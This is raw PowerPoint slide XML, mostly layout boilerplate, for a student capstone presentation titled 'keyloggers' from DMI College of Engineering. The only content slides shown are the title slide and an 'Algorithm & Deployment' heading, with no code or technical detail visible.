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72" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="291" r:id="rId3"/>
    <p:sldId id="292" r:id="rId4"/>
    <p:sldId id="293" r:id="rId5"/>
    <p:sldId id="294" r:id="rId6"/>
    <p:sldId id="295" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="298" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="301" r:id="rId13"/>
    <p:sldId id="302" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="304" r:id="rId16"/>
    <p:sldId id="305" r:id="rId17"/>
    <p:sldId id="306" r:id="rId18"/>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snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="850" y="62"/>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tableStyles" Target="tableStyles.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customXml" Target="../customXml/item1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXmlProps" Target="../customXml/itemProps1.xml"/><Relationship Id="rId2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7" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048680"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81"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13-04-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048682"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83"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84"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85"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p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>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51" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048645" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048646"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7" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048648" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048649"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49" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048630"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1"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048632"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3"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34"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5"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36" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048637" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048638" name="Slide Number Placeholder 12"/>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2"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p>
            <a:fld id="{78DD82B9-B8EE-4375-B6FF-88FA6ABB15D9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024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52" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650"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51"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048652"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53" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048654" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048655"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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048656" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048657" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="1391479"/>
            <a:ext cx="5194767"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8" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6416039" y="1391479"/>
            <a:ext cx="5194769"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9" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048660" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048661"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54" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048662" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="988332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048663"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64"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5"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66"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7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048668" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669"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7" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048625" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048626" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048628"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55" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048670" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4EDE50D6-574B-40AF-946F-D52A04ADE379}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048671" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048672"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6" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048673"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74"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048675"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6"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77" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605951" y="6456916"/>
            <a:ext cx="2844799" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D82884F1-FFEA-405F-9602-3DCA865EDA4E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048678" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6452590"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048679"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0" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048639"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048640"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41"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42" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048643"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44"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t>4/13/2024</a:t>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hyperlink" Target="https://github.com/techtrainer20/TNSDC" TargetMode="External"/><Relationship Id="rId2"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a:xfrm>
            <a:off x="1359108" y="1821635"/>
            <a:ext cx="9144000" cy="977778"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="1" dirty="0" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048590" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329782" y="1034321"/>
            <a:ext cx="12726648" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3200" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096000" y="3219450"/>
            <a:ext cx="4000000" cy="1767839"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ented </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:endParaRPr sz="2800" lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ith </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antony </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:endParaRPr sz="2800" lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ege </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-GB" sz="2800" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Engineering </a:t>
            </a:r>
            <a:endParaRPr sz="2800" lang="en-GB">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14" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
